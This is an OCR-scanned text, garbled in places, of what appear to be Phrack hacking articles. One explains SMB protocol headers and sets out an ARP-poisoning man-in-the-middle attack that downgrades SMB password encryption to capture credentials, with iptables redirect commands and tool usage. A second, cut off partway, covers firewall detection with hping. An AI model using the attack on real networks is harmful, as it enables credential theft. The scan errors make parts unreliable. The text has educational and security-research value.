W 


0x4 0x2 0x4 0x9 0x4 Oxc 0x4 Oxc 0x2 0x0 


And each 4-bit half is added to the 


Ox4 + 0x41 


Ox2 + 0x41 = 0x43 


And you have the encoded N 


Note 


0x45 


-—> ASCII value = 


A 


-> ASCII value = C 


0x42 0x49 O0x4c Ox4c 0x20 0x20 ...... 0x00 


Each bytes are splited into 4-bit halves. 


ASCII value of the ’A’ letter (0x41) 


ETBIOS name which is 32 bytes long. 


SMB can run directly over TCP without NBT (it’s supported on Win2k 


and XP on port 445). 


You don’t need to know more, 


about NETBIOS 


if you want 


read [3] and [4]. 


—---[ 6.3 - The SMB base header 


This header is used in all SMB packets, 


UCHAR Protocol [4]; 
UCHAR Command; 


union { 


struct { 
UCHAR ErrorClass 
UCHAR Reserved; 
USHORT Error; 


} Dos! 
ULONG 
} Status; 


Error; 
Status; 


UCHAR Flags; 
USHORT Flags2; 


union { 


USHORT Pad[6]; 
struct { 
USHORT PidHigh; 


U 
U 
} Extra; 


LONG Unused; 
LONG Unused2; 


USHORT Tid; 
USHORT Pid; 
USHORT Uid; 
USHORT Mid; 
UCHAR WordCount; 


// 
// 


; L- 


The NETBIOS name are not limited to 15 characters. 


to have more information 


this is its definition 


Contains OxFF,’ SMB’ 
Command code 


Error class 
Reserved for future use 
Error code 


32-bit error code 


Flags 
More flags 


Ensure section is 12 bytes long 


High part of PID 
Not used 


Tree identifier 

Caller’s process id 
Unauthenticated user id 
multiplex id 

Count of parameter words 
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USHORT ParameterWords[ WordCount ]; // The parameter words 
USHORT ByteCount; // Count of bytes 
UCHAR Buffer[ ByteCount ]; // The bytes 


he "Protocol" field contains the name of the protocol (SMB) with a 
OxFF before. 

The "Command" field contains the value of the requested command. For 
example 0x72 is for the "negotiate protocol" command. 


The "Tid" field is used when the client is successfully connected to a 
ressource on a SMB server . The TID number identifies this ressource. 


The "Pid" field is used when the client has successfully created a 
process on the server. The PID number identifies this process. 


The "Uid" field is used when a user is successfully authenticated 


on a server. The UID number identify this user. 


The "Mid" field is used in couple with the PID when a client has 
several requests on the server ( process, threads, file acess...). 


The "Flags2" field is also important, when the bit 15 is armed, the 


= 


strings are UNICODE strings 


----[ 6.4 - Description of the most importants SMB commands 


SMB negotiate Protocol (negprot) 


The Negotiate Protocol Command is used in the first step of the SMB 
session establishment. 


The Command code for the field "Command" in the SMB Base header is : 0x72. 
Here is the description of the negprot request and reply headers 


Request header 


UCHAR WordCount; Count of parameter words = 0 
USHORT ByteCount; Count of data bytes 
struct { 

UCHAR BufferFormat; 0x02 -- Dialect 

UCHAR DialectName[]; ASCII null-terminated string 


} Dialects[]; 


This packet is sent by the client to give the server its list of 
SMB protocol versions supported. 


Just three things to say, for this packets, "WordCount" field is 
always set to zero, "ByteCount" field is equal to the size of the 
"Dialects" structure, the field "BufferFormat of "Dialects" is always 
equal to 0x02. 


The "DialectName" string contains the name of the several SMB 
protocol versions supported by the client. 


Reply header 


UCHAR WordCount; Count of parameter words = 17 
USHORT Dialect Index; Index of selected dialect 
UCHAR SecurityMode; Security mode: 


bit 0: 0 = share, 1 = user 
bit 1: 1 = encrypt passwords 
USHORT MaxMpxCount; Max pending multiplexed requests 
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USHORT MaxNumberVcs; Max VCs between client and server 
ULONG MaxBufferSize; Max transmit buffer size 

ULONG MaxRawSize; Maximum raw buffer size 

ULONG SessionKey; Unique token identifying this session 
ULONG Capabilities; Server capabilities 

ULONG SystemTimeLow,; System (UTC) time of the server (low). 
ULONG SystemTimeHigh; System (UTC) time of the server (high). 
USHORT ServerTimeZone; Time zone of server (min from UTC) 
UCHAR EncryptionKeyLength; Length of encryption key. 

USHORT ByteCount; Count of data bytes 

UCHAR EncryptionKkey[]; The challenge encryption key 

UCHAR OemDomainName[]; The name of the domain (in OEM chars) 


4 


his packet is sent by the server to give the client the list 
of SMB protocol versions supported, the SMB domain name of the server 
and an encryption key if necessary. 


IMPORTANT 


The first interessant field is the "SecurityMode" byte. If the bit 0 
is armed we have a user security level. If it’s not, we have a 
s 
W 


hare security level. If the bit 1 is armed the password is encrypted 
ith a DES encryption in block mode. 


a 
F 


he "SessionKey" field is used to identify the session . There is one 
Single session key for one session. 


GJ 


he "Capabilities" field indicates if the server supported UNICOD 
strings or NT LM 0.12 particular commands 

The datas are at the end of the header. With a negprot reply, 
these datas corespond to the strings "EncryptionKkKey" and 
"OemDomainName". 


he length of these two strings together is given by the "Bytecount" 
field. 


The length of the "EncrytionKey" string is given by the field 
"EncryptionKeyLength". The "EncryptionKey" string contains the Key for 
the encryption of the password. 


The length of "OemDomainName" is given by 

(Bytecount —- EncryptionKeyLength) . 
he "OemDomainName" string contains the SMB domain name of the server 
(in OEM chars). 


Session setup and X 
The Session Setup and X packets (SesssetupX or setupx for 
abbrevation) are used to deal with the identity of a user or when you 
have to give a password to acess a ressource. 


The Command code for the Session Setup and X command is 0x73. 


Request header 


UCHAR WordCount; Count of parameter words = 13 

UCHAR AndXCommand; Secondary (X) command; OxFF = none 

UCHAR AndXReserved; Reserved (must be 0) 

USHORT AndxOffset; Offset to next command WordCount 

USHORT MaxBufferSize; Client’s maximum buffer size 

USHORT MaxMpxCount; Actual maximum multiplexed pending 
requests 

USHORT VcNumber; 0 = first (only), nonzero=additional 
VC number 

ULONG Sessionkey; Session key (valid iff VcNumber != 0) 
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USHORT Account password size, ANSI 
CaseInsensitivePasswordLength,; 
USHORT Account password size, Unicode 
CaseSensitivePasswordLength; 
ULONG Reserved; must be 0 
ULONG Capabilities; Client capabilities 
USHORT ByteCount; Count of data bytes; min = 0 
UCHAR Account Password, ANSI 
CaseInsensitivePassword[]; 
UCHAR CaseSensitivePassword[]; Account Password, Unicode 
STRING AccountName[]; Account Name, Unicode 
STRING PrimaryDomain[]; Client’s primary domain, Unicode 
STRING NativeOS[]; Client’s native operating system, 
Unicode 
STRING NativeLanMan[]; Client’s native LAN Manager type, 
Unicode 


This packet gives a lot of information about the client’s system. 


The field "MaxBufferSize" is very important, it gives the maximun 
size of data that the client can receive. If you set it to zero 
you will not receive any type of data from the server. 


For the data, you have several strings. The most important are 
"CaseSensitivePassword" (password in UNICODE characters) 
and "CaseInsensitivePassword" (password in ANSI characters). 


GJ 


One of both is used, it depends if the server is supporting UNICOD 
strings or not (see negatiate protocol reply packet description). 
The length of the password is given in the fields 
"CaseInsensitivePasswordLength" or in 
"CaseSensitivePasswordLength" 


For the other strings, 
is given by the "Bytecount" 


see the description. 
field. 


The count of data bytes 


Reply header 


UCHAR WordCount; Count of parameter words = 3 
UCHAR AndXCommand; Secondary (X) command; OxFF = 
none 
UCHAR AndXReserved; Reserved (must be 0) 
USHORT AndxOffset; Offset to next command WordCount 
USHORT Action; Request mode: 
bitO = logged in as GUEST 
USHORT ByteCount; Count of data bytes 
STRING NativeOS[]; Server’s native operating system 
STRING NativeLanMan[]; Server’s native LAN Manager type 
STRING PrimaryDomain[]; Server’s primary domain 
Again, there are a lot of information on this packet OS Type, 


version of the SMB server software running on server and DomainName. 


If the connection failed, NativeLanman 


and PrimaryDomain strings. 


there is nothing for NativeOS, 


OK I have finished with the 
the SMB protocol. 


"hard" part, we can play a little with 


If you want to learn more about it, read [1]. 


----[ 6.5 - How I can recover SMB passwords in clear from the network 


when they should be encrypted 


During the session establishment, 


the password is sent to the server 
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during the SMB setupx Session. The SMB negprot reply packet contains 
a bit in the "SecurityMode" field which allows password encryption 
or not. 


So if you want to have a password in clear when all is encrypted, you 
have two possibilities. 


The first one is to catch the encryption key and the encrypted 
password and brute force it ! It can be very long 


Some programs like LophtCrack (with SMBGrinder), dsniff or readsmb2 
sniff SMB encrypted passwords. 


The second way is to hijack the connection and to make the client 
believe that the password should not be encrypted. 


This technic is a bit complex to explain, but I will say how to 
do it ! 


If the server is configured to encrypt password, the SMB negprot 
reply packet has the bit 1 of the "SecurityMode" field armed. But if 
an attacker sends a negprot reply packet with this bit equal to 
zero before the server, the password will be in clear in the 
SessetupxX request packet 


negprot request 
[client] > [server ] 


[attacker waits for a negprot request] 


[client] < | [server] 
| fake negprot reply 
| 
[attacker sends his fake neprot reply] 


real negprot reply 
[client] < [server] 


[attacker (does nothing) ] 


sessetupX request with the password in clear text 
[client] > [server] 


[attacker sniffs the password in clear text] 


These diagrams illustrate a direct packet injection on the network. 
In majority of case, this method doesn’t work because the fak 
negprot reply could treated after the real. There is also other 
problems, session failures, validity of password, does not work 

in a switched environment... 
We can avoid all of these problems by using Arp-Poisoning. 


I will not explain and describe what is ARP-Poisoning, you could find a 
lot of docs about it on internet . But, if you don’t know what it is, 
you just have to know that this attack allow the attacker to redirect 
and modify the traffic between the server and the client. 


If you consider this situation, the attacker is between the both. 


He is the man in the middle 


----[ 6.6 - Man in the middle attack 
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"Attack where your enemy is not expecting you" 
Sun Tzu, “The art of war" 
Now I will describe the man in the middle attack. This attack allow 


you to bypass switches, to avoid connection failures and to grab the 
password in clear. 


Let’s consider that the traffic between the client and the server 
is redirected by the attacker ( thanks to ARP poisoning !). 

The client requests a SMB session to the server. 

The client will send packets to the SMB port (139) of the server. Th 
attacker receives them. But the attacker doesn’t redirect the packet to 
the server. 

The whole incoming traffic to the server’s SMB port (so to the attacker’s 
machine) is redirected on the local port 1139 of the attacker (very easy 
to do with NAT and iptables). 

The whole traffic (not only SMB) is redirected also with iptables and 
NAT. 
On the port 1139, there is a program (a transparent proxy program) that 
assumes the modification and redirection of the SMB packets. 


[The two iptables/NAT commands are 


[To redirect the incoming traffic (on port 139 ) to a local port (1139 for 
example). 


iptables -t nat -A PREROUTING -i ethO -p tcp -s 192.168.1.3 \ 
—-dport 139 -j REDIRECT --to-port 1139 


192.168.1.3 is the IP address of the client 


To redirect the whole traffic 


iptables -t nat -A POSTROUTING -o eth0O -—j MASQUERADE 


What are the modifications ? 
The attacker modifies the negprot reply to have password in 

clear text. The attacker recovers also the encryption key. 

The attacker set to zero the value of the length of the encryption 
key and put the domain name instead of the encryption key. 

He sets the encryption bit of the "SecurityMode" field to 0. 

With this, the password will not be encrypted. 


The client will send the password in clear in a sesssetupx request. 
When the attacker has the password, he encrypts it with the encryption 
k 

t 


y recovered before and sends the sesssetupx request (with 
he encrypted password) to the server. 

The server sends a sesssetupx reply to accept or refuse the session. 
The attacker redirects the sesssetupx reply and the whole traffic 
after. 


he session will not fail and nobody has saw our man in the middle !. 


Description 


ARP-P ARP-P 
[client] < [attacker] > [server] 


The attacker processes to a ARP Poisoning attack to redirect the whol 
traffic between the two machines. 
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[client] < > [attacker] < > [server] 


The traffic redirection is operated with NAT and iptables. 


port 139 
[client] > [attacker] [server] 


The attacker receives the first packet to the SMB server port. 


[client] >[attacker 139] [server] 
| 
V 
[attacker 1139] 


The attacker redirects it to the port 1139. 
On the port 1139, our proxy program is listening. 


negprot request 
[client] > [attacker] [server] 


The attacker receives the negprot request. 


negprot request 
[client] [attacker] > [server] 


The attacker redirects directly the negprot request to the server. 


negprot reply 
[client] [attacker] < [server] 
(encryption bit set 
to have password encrypted) 


The server replies with a negprot reply with the encryption 
bit set to have the password encrypted. The attacker doesn’t 
redirects this packet. He changes the encryption bit to have 
plain text password 


negprot reply 
[client] < [attacker] [server] 
(encryption bit set 
to have plain text password ) 


The attacker sends the modified negprot reply with the encryption 
bit changed to have the password in clear text. 


sesssetupxX request 
[client] > [attacker] [server] 
(password in clear text) 
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The client sends the password in clear text, the attacker recovers 
i oe 


sesssetupx request 
[client] [attacker] > [server] 
(password encrypted) 


The attacker sends a sesssetupx request to the server with the 
encrypted password. 


sesssetupxX reply 
[client] < [attacker] < [server] 


The servers sends the sesssetupx reply. The attacker redirects it. 


[client] < > [attacker] < > [server] 


The attacker continues to redirect traffic between the two machines 
until the end of the SMB session. 


The implementation of the man in the middle attack is given in the 
Appendix A (the NAT and iptables rules are given also). 


Take a look at the source code, you will learn a lot of 
details !. 


----[ 6.7 — Notes about windows 2k/XP SMB operating over TCP/IP 


As I wrote before, on Windows 2k/XP, SMB can run directly over TCP. 
The SMB server is listening incoming connexions on port 445. 
But it’s not so "directly". In fact instead of having a NETBIOS header 

which is 4 bytes long, we have a other header which is 4 bytes long too. 


Description 


TCP 


SPECIAL HEADER 


SMB BASE HDR 


This special header is defined like this 


UCHAR Zero; // Set to zero 
UCHAR Length[3];// Count of data bytes (the 4 bytes of 
the header are not included) 


[This special header is not very different than the NETBIOS header. You 
will understand why. 


This is the NETBIOS header 


UCHAR Type; // Type of the packet 

UCHAR Flags; // Flags 

USHORT Length; // Count of data bytes (netbios header 
not included) 


When SMB is running over TCP, the NETBIOS request session should 
be not used. 
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In fact, the NETBIOS names of the client and of the server should not 


be sent. So the value of the "Type" field in the NETBIOS is always 
equal to zero (the "Type" field is different from zero when the client 
sends his encoded NETBIOS name —- Type = 0x81 - and when it receives 

the reply Type = 0x82 -). Remember, during the SMB session the 


Type field is equal to zero ( it’s the "Type" code for the NETBIOS 
session message). 


For the first byte nothing is different. 


For the last three bytes now 


The "Flags" field of the NETBIOS header is always set to zero. 
The length of the packet only takes the two last bytes of the special 
header. 


The three last bytes are the sam 


To conclude there is no difference between the NETBIOS and the special 
header when NETBIOS is not used. 


Downgrade attack 


If the client (running on windows XP or 2k) has NBT enabled, it always 
try to connect to the port 139 and 445 simultaneously. If the client 
has a response from the port 445, the client will send a RST packet 

to the port 139. If the client has no response from the port 445, it 
will try to connect on port 139. If it has no response from the both, 
the session will fail. 
If the client has NBT disabled, the client will try on the port 445 
only. 


To perform a Downgrade attack i.e force the client to not use the port 
445 and to use the port 139, you have to make believe to the client 
that the 445 is closed. With the transparent proxy attack it’s very 
easy, with iptables you have just to redirect the incoming traffic 

on the attacker’s machine on port 445 to a closed port. With this 

the client will use the port 139 (the iptables rules for this is 
given in appendix A). 
This will work if NBT is enabled. 


If the client has NBT disabled, the transparent proxy will operate the 
SMB traffic on port 445. You’ve got an option on the program for this. 


Ok, we have finished with the attack for recovering passwords. 
We will study now an another important part of SMB. 


--[ 7 - Transaction subprotocol and RAP commands 


I will explain in this chapter a panel of special (and obscur ) 
SMB commands : the RAP commands. 

These commands use the transaction subprotocol. 

I will also describe this subprotocol. 


----[ 7.1 - The transaction subprotocol 


When a large amount of data is sent during a SMB session or if there is 
a specific operation requested,the SMB protocol includes a transaction 
subprotocol. 


The transaction subprotocol is mainly used for SMB Remote Procedur 
Calls : The RAP commands (RAP for Remote Administration Protocol). 
But I will explain it later. 


The transaction subprotocol is not a derived protocol of SMB. The 
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transaction subprotocol is just an other command for SMB. So the 
transaction subprotocol is layered on SMB base header and the command 
code for the transaction subprotocol is 0x25. 


Like the other commands there is a request and a reply. 
This is the Transaction request header 


UCHAR WordCount; Count of parameter words; value = 
(14 + value of the "SetupCount" field) 
Total parameter bytes being sent 

Total data bytes being sent 


R otalParameterCount; 
R otalDataCount; 


SHO 

SHO 

USHORT MaxParameterCount; Max parameter bytes to return 

USHORT MaxDataCount; Max data bytes to return 

UCHAR MaxSetupCount; Max setup words to return 

UCHAR Reserved; 

USHORT Flags; Additional information: 
bit 0 - also disconnect TID in TID 
bit 1 - one-way transaction (no 
response) 

ULONG Timeout; 

USHORT Reserved2; 

USHORT ParameterCount; Parameter bytes sent this buffer 

USHORT ParameterOffset; Offset (from header start) to 
Parameters 

USHORT DataCount; Data bytes sent this buffer 

USHORT DataOffset; Offset (from header start) to data 

UCHAR SetupCount; Count of setup words 

UCHAR Reserved3; Reserved (pad above to word) 

USHORT Setup[SetupCount]; Setup words (# = SetupWordCount) 

USHORT ByteCount; Count of data bytes 

STRING Name[]; Name of transaction (NULL if 
SMB_COM_TRANSACTION2) 

UCHAR Pad[]; Pad to SHORT or LONG 

UCHAR Parameters [ Parameter bytes (# = ParameterCount) 

ParameterCount ]; 

UCHAR Padl[]; Pad to SHORT or LONG 

UCHAR Data[ DataCount ]; Data bytes (# = DataCount) 

n a majority of case, a RAP command sent with Transaction subprotocol 


ale 
may need several Transaction packets for sending the parameters 

and data bytes. The parameters bytes are usually sent first, followed 
by the data bytes. If several transaction packets must be involved, 
t 
t 


he server sends this small packet for acknoledgement between each 
ransaction packets 


Interim Reply packets 
UCHAR WordCount; Count of parameter words = 0 
USHORT ByteCount; Count of data bytes = 0 


For the transaction request header, the "TotalParameterCount" field 
represents a count of paramaters bytes to be sent and it’s the same 
for the "TotalDataCount" field (count of data bytes to be sent). 


The offset from the start of the SMB base header to the parameters 
bytes and the data bytes are given with the "ParameterOffset" and 
"DataOffset" fields. 


The parameters bytes are in the "Parameters" field. 
The data bytes are in the "Data" field. 


You must understand that these "Parameters" and "Data" fields are used 
for the RAP command. "Parameters" contains the parameters bytes for 
the RAP command and "Data", the data bytes. 


The fields for "DataCount" and "ParameterCount" represent respectivily 
the count of data bytes and the count of parameters bytes present in 
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the considereted transaction packet. 
"TotalParameterCount" 
all parameter and data bytes fit 
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lved that the server 
it for another packets. 


and the 
in a single packet. 


If these fields are equal to 
it involved that 
If they are not, 


"TotalDataCount", 


(for request) 
When all packets ar 


or the client (for reply) 
received, th 


parameter and data bytes are marshalled for analysis. 


Take a look at the field "WordCount", it contains the value 
14 + "SetupCount" field, in majority of case SetupCount is equal to 0. 
The Transaction reply header: 
There is not a big differenc n the reply and the request 
UCHAR WordCount; Count of data bytes; value = 10 + 
"Setupcount" field. 
USHORT TotalParameterCount; Total parameter bytes being sent 
USHOR otalDataCount; Total data bytes being sent 
USHORT Reserved; 
USHORT ParameterCount; Parameter bytes sent this buffer 
USHORT ParameterOffset; Offset (from header start) to 
Parameters 
USHORT ParameterDisplacement; Displacement of these Parameter 
bytes 
USHORT DataCount; Data bytes sent this buffer 
USHORT DataOffset; Offset (from header start) to data 
USHORT DataDisplacement; Displacement of these data bytes 
UCHAR SetupCount; Count of setup words 
UCHAR Reserved2; Reserved (pad above to word) 
USHORT Setup[SetupWordCount]; Setup words (# = SetupWordCount) 
USHORT ByteCount; Count of data bytes 
UCHAR Pad[]; Pad to SHORT or LONG 
UCHAR Parameter bytes (# = ParameterCount) 
Parameters [ParameterCount]; 
UCHAR Padl1[]; Pad to SHORT or LONG 
UCHAR Data[DataCount]; Data bytes (# = DataCount) 
The client must use the "ParameterOffset" and "DataOffset" to know the 


offset 


(from the beginning of the SMB base header) 


parameters bytes. 


a [ 7 


RAP 
RPC. 


(Remote 


.2 — RAP commands 


RAP request 


RAP Rep 


Administration Protocol) 


of data and 


is the SMB implementation of 


TCP HDR 


NETBIOS HDR 


SMB BASE HDR 
SMB TRANSACTION REQUEST HDR 
RAP REQUEST PARAMETERS 
RAP REQUEST DATAS 

ly 


TCP HDR 
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NETBIOS HDR 


SMB BASE HDR 


SMB TRANSACTION REPLY HDR 


RAP REPLY PARAMETERS 


RAP REPLY DATAS 


When you use a RAP command you always find the string "\PIPE\LANMAN" 
in the "Name" field in the transaction (request and reply) header. 


These are several examples of RAP commands 


-NETSHAREENUM : Retrieve information about each shared ressource 
on a server 


-NETSERVERENUM2 : List all the computer of specified types ina 
specified domain 


-NETSERVERGETINFO : Get information about a specified server 


-NETSHAREGETINFO : Retrieve information about a paticular shared 
ressource 


-NETWKSTAUSERLOGON : Execute on a SMB server for logging an user. 


5 


-NETWSTAUSERLOGOFF : The same but for deloging. 


-NETUSERGETINFO : Obtain information about a particular user. 


-NETWKSTAGETINFO : Obtain information about a particular station. 


—SAMOEMCHANGEPASSWORD : For changing the password of a specified user on 
a remote SMB server. 


I’m not going to describe all of these commands, I will just take one for 
example (to have a listing of shared resource avaible on a server). 


If you want to know more about RAP commands read [2]. 


--[ 8 - Using RAP commands to list available shares on a server 


This part is a complement of the previous chapter. I will explain 
how the RAP commands work by giving an example. 


The program given in Appendix B is the implementation of what is 
explained in this chapter. It does the same things that the commands 
"net view \\ServerIP" (for DOS) or "smbclient -L ServerIP -N " 

(on Linux). But this program allows you to specified the NETBIOS 
name, it is a bit anonymous. If you read this source you will 


learn a lot a things about SMB network programming. 


How I can retrieve SMB everyone shares on a network 


The process is easy to understand. The client must be authentificated 
on the server . The client identifies itself with the process developed 
in chapter 3 (with no password). When the server has checked the 
identity of the client, the client sends a Tconx request (after the 
Sessetupx reply). 
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Tconx means "Tree CONnect and X). 


[The TconX request packet is used to acess to a shared ressource. 


----[ 8.1 - Tconx Packets 


Request header 


The TconX packets are layered on the SMB Base Header ("Command" = 0x75). 


UCHAR WordCount; Count of parameter words = 4 

UCHAR AndXCommand; Secondary (X) command; OxFF = none 
UCHAR AndXReserved; Reserved (must be 0) 

USHORT AndxOffset; Offset to next command WordCount 
USHORT Flags; Additional information 

USHORT PasswordLength; Length of Password[] 

USHORT ByteCount; Count of data bytes; min = 3 
UCHAR Password[]; Password 

STRING Path[]; Server name and share name 

STRING Service[]; Service name 


[The password was sent during the session establishement. 
The Password length is set to 1 and and the Password 
string contains null value (0x00). 


The string "Path" contains the name of the ressource that client wishes 
connect. It use the unicode style syntax . For example I want to connect 
on a share called "myshare" on a server called "myserver" . The 

Path string will containt "\\myserver\myshare". 


The "Service" string contains the type of ressource requested 


string Type of ressource 

Det disk share. 

"LPT1:" printer. 

"LPC® named pipe. 

"COMM" communications device. 
Weta eee any type of device. 


For scaning any type of device you must use the "?????" string in the 
"Service" field. 


After sending your Tconx request on the server. The server replies with 
a TconX reply. You must recover the "Tid" field (in the SMB Base header) 
which is the Transaction request with the RAP command. 
You must specified to the server that you want to know which ressources 
are available. For this, you must use the RAP command : NETSHAREENUM. 


c5 


----[ 8.2 - Explanation of the RAP command "NetShareEnum" 


The RAP command that we will study is NetShareEnum. 


The RAP Command "NetshareEnum" request 


The field "Parameters" of the transaction request header received 


The 16 bit code of function NetShareEnum : 0; 


The parameter desriptor string : "WrLeh" 
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Data descriptor string for returned data : "B13BWZ2" 


A 16 bit integer with a value of x01; 


A 16 bit integer that contains the size of the receive buffer. 


It will be too long to explain how parameter and data descriptor strings 
works. These strings are used to know the size and the format of 
parameters and datas. One parameter and one data descriptor string 

is defined for each RAP command. 


if you want to know more about this strings, read [2]. 


No datas are needed for this request so the "DataCount" and 
"TotalDataCount" fields are equal to zero. 


NETBIOS HDR [== ======= > 4 bytes 


SMB BASE HDR | ========= > 32 Bytes 


Gl 


SMB TRANSACTION REQUEST HDR 


The Transaction request "Parameters" field receives the parameters 
for the RAP request 


0x0000 >A 
| 
W ie L e h 0x00 | -~-~-------- > B 
| | 
B 1 3 B W Z| 0x00 |---> C 
| | 
0x0001 Oxffff > D 
The NetshareEmun function code : 0x00 


[The parameter descriptor string 
The data descriptor string 
0x01 (defined value) and Oxffff (Max size of the received buffer) 


GAWD P,P 


And the server replies 


the "Parameters" field of the transaction reply header receives 
A 16 bit integer word that contains the return status code 


Succes 0 

Access Denied 5 

Network Acess Denied 65 

More data 234 

Server not started 2114 
Transaction configuration bad 2141 


A 16 bit "converted word", uses to calculate an offset to remark 
strings. 


A 16 bit containts the number of entries returned = number of 
SHARE_INFO structure (see below ). 


A 16 bit representing the number of available entries. 


The field "Data" of the transaction reply header contains the several 
SHARE_INFO structures. 
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The SHARE INFO structure contains the information about each shared 
ressource available and it is defined like this 


struct SHARE_INFO { 
char shil_netname[13]; /*Name of the ressource*/ 


char shil_pad; /*Pad to a word*/ 


unsigned short shil_type; 


/*Code specifies the type of the shared resssource 
O Disk Directory tree 
1 Printer queue 
2 Communications device 
3° IPC*/ 


char *shil_remark; /*Remark on the specified 
ressource*/ 


} 


shil_remark is a 32 bits pointer to a string. This string contains a 
remark about a shared ressource. You must substract the 16 lower 
bits of "shil_remark" to the "converter word" to know the offset 
between this string and the beginning of the RAP reply parameters 
header. 


In fact with a ascii schema 


NEIBTOS:-HDR”  . .... ... . _ [Sere snsSs= > 4 bytes 


SMB BAS 


al 


Hpe - © (read pe > 32 Bytes 


SMB TRANS REPLY HDR 


Description of the "Parameters" section of the Transaction reply packet 
(corresponding to the parameters of the NetShareEnum reply) 


status code > 2 bytes 
converted word > 2 bytes 
number of entries returned > 2 bytes 
number of entries available > 2 bytes 


Data section of the Transaction reply (corresponding to the 
several SHARE_INFO structures if there is more than one ressource 
available) 


shil_netname 2. | HRS RR > 13 bytes 

shil_pad to pad to word | ====-=~----- > 1 byte 
type of service 2 fp Ree > 2 bytes 
pointer to remark string 7) | =nRs5555--- > 4 bytes 


Another SHARE INFO structures 
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remark string 1 


another remarks strings 


-—-[ 9 — Conclusion 


H 


hope you have learned a lot of things in this article. 
If you have any comments, questions, send it at : 


<ledin@encephalon-zero.com> 
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--[{ 11 - Thanks 
Just a Merry Christmas to TearDrop, Frealek and "el Tonio". 


A big thank to TearDrop for all. Without him, nothing could 
be possible ! 


Take a look at <gps.sourceforge.net>, you will find a very good 
(and free) scanner !. 


Thanks to Mr D. (my network administrator !), for all the advices 
and the several Linux distribs. 


Thanks to the Chemical brothers for the inspirational music. 


Thanks to the phrack staff, for all their remarks and particulary 
about the transparent proxy attack. 


[To you for reading this article ;). 


--[ Appendix A 


This program allows you to have password in clear directly from 
the network when they should be encrypted. It works with libnet 
(v 1.1 !) and libpcap. 

This is the implementation of the Transparent proxy attack of the 
chapter 6.6. 


libnet : www.packetfactory.net 


libpcap : www.tcpdump.org 
You must be root to compile and to execute this program ! 


If you want to compile it, you could use 


http://www.snia.org/tech_activities/CIFS/CIFS-TR-1p00_FINAL. pdf 
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"gcc SMBproxy.c -o SMBproxy -lnet -lpcap" 


If you want to use it 
"SMBproxy —-i interface 
-c Client’s IP address 
-s Server’s IP address 
-f your fake IP (what you want : 6.6.6.6 for example)" 
-l listening port (1139 by default) 


Be careful the program will ask you about Windows 2k/XP specifictions 
support. But you must answer "y" when NBT is disabled not when it’s 
enabled on Windows 2k/XP ! 


You give the IP adress of a client and of the server, this program 
waits a connection of the client to a SMBserver, launches the attack, 
recovers the password and redirects the traffic. 

The fake IP parameter corresponds to your fake IP, give what you want ! 
The attacker’s machine should have no active connections with the server 
or with the client (like FTP or telnet ...). 

The default listening port is 1139 


This program gives the password and the user name (if necessary). It 
also gives the security level (share or user). If the connection has 
succeeded, it gives the name of the share and a message like "password 
valid". If it has failed, it gives nothing (just the password and the 
user name). 

This program should be compiled on Linux for some technical reasons, 
like the network byte ordering. You shouldn’t use it on the loopback 
interface. 


Support Windows 2k/XP specifications. 


This is the iptables/NAT command to execute on the attacker’s machine 


o redirect incoming traffic to port 139 on port 1139 


iptables -t nat -A PREROUTING -i ethO -p tcp -s 192.168.1.3 \ 
—-dport 139 -j REDIRECT --to-port 1139 


192.168.1.3 is the IP address of the client. 


To redirect the whole traffic 


iptables -t nat -A POSTROUTING -o eth0O -—j MASQUERADE 


o redirect incoming traffic to port 445 on port 1139 


(for Windows 2k/XP client with NBT disabled) 


#iptables -t nat -A PREROUTING -i ethO -p tcp -s 192.168.1.3 \ 
—-dport 445 -j REDIRECT --to-port 1139 


192.168.1.3 is the IP address of the client. 


if you want to perform the downgrade attack of the chapter 6.8 remplace 
the port 1139 by a closed port. 


Be careful, for the traffic redirection, this line must be present in the 
/etc/sysconfig/network 


FORWARD_IPV4=true 


= 


This program doesn’t support UNICODE strings. 
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=----=[ Firewall spotting and networks analisys with a broken CRC ]=----= 
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-—-[ 0 - School 


Packet filters firewall are going to be deployed more and more for the 
sense of security the word "firewall" has got on not-technical people. 
Available as commercial software, embedded device or inside opensource OS 
they work at level 3. The support for level 4 isn’t complete: they filter 
ports numbers, TCP flags, seq numbers, defragmentation, but 


What about level 4 checksum? 


Are they checking for TCP checksum before analyze flags or port numbers? 
No. 


Most developers say there would be too overhead and other think that 
the packet will be simply dropped by destination OS stack. All correct, but 
how could we take advantage of this "feature"? 


1) firewalls reply spotting 
2) damn 31337 MiM spotting 
3) insert invalid packets inside a network 


--[ 1 - Something In The Way 


A complete network stack will drop invalid packets without response. No 
matter if that port is closed, open or whatever... But Packet Filters 
aren’t so smart and they will reply. 


If we want to determine if there is a packet filter between us anda 
target host we must first check if the packet filter is configured to drop 
the packets or to send back an error. For this we send a valid tcp packet 
to any port that is supposed to be filtered: 


telnet www.oracle.com 31337 
Trying 148.87.9.44... 
telnet: Unable to connect to remote host: Connection refused 


Good. Either the target host itself or a packet filter sends back a 
RST. Next step is to check if the RST comes from the target host or from 
a packet filter: 


hping -S -c 1 -p 31337 -b www.oracle.com 
HPING www.oracle.com (rl0 148.87.9.44): S set, 40 headers + 0 data bytes 
len=46 ip=148.87.9.44 flags=RA seq=0 tt1l=23 id=52897 win=512 rtt=459.8 ms 
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If we get a reply we know that a packet filter is in place. If we 
dont get a reply we suspect that the packet arrives unfiltered at the 
destination host and is dropped by the TCP stack (e.g. no packet filter is 
in place). 


Another technique to detect th xistence of a packet filter is to 
compare the TTL of a RST and a SYN (which comes directly from the target 
host). The TTL-technique fails for all packet filters in bridging mode 
or filters that do not decrease the TTL and are placed directly in front 
of the target host (normal DMZ setup). The CRC-technique as described 
above on the other hand detects a packet filtering device in both cases. 


Other example, UDP this time: 


# hping -2 -c 1 -p 53 -b www.redhat.com 
HPING www.redhat.com (rl0 66.187.232.56): udp mode set, 28 headers + 0 data 
ICMP Packet filtered from ip=63.146.1.74 name=UNKNOWN 


Having a way to distinguish packets from the host and the firewall, 
let us use OS identification tools working only with firewall packets 
without mixing host and firewall replys. Try nmap -O. 


Interesting ? 

Well I made a quick patch for Nmap-3.1ALPHA4 that add 2 new type of scan: 
-sZ BadTCP SYN stealth port scan 
-sV BadUDP port scan 


Note that -sZ is derived by a bad drawn -sS and -sV by -sU. BadTCP scan 
uses FIN scan engine because the default behavior of a host is not to reply. 
BadUDP scan uses UDP scan engine because the default behavior of a host is 
not to reply. 


I hope that Fyodor will think about a from scratch version of Nmap for 
version 4.00 that could permit to define the real and complete situation of 
host ports: 


- closed 

— opened 

- filtered (no reply) 

-— firewalled (firewall reply) 


The patch is below. 


How does Scanlogd work against this new type scans? Uhm, it still 
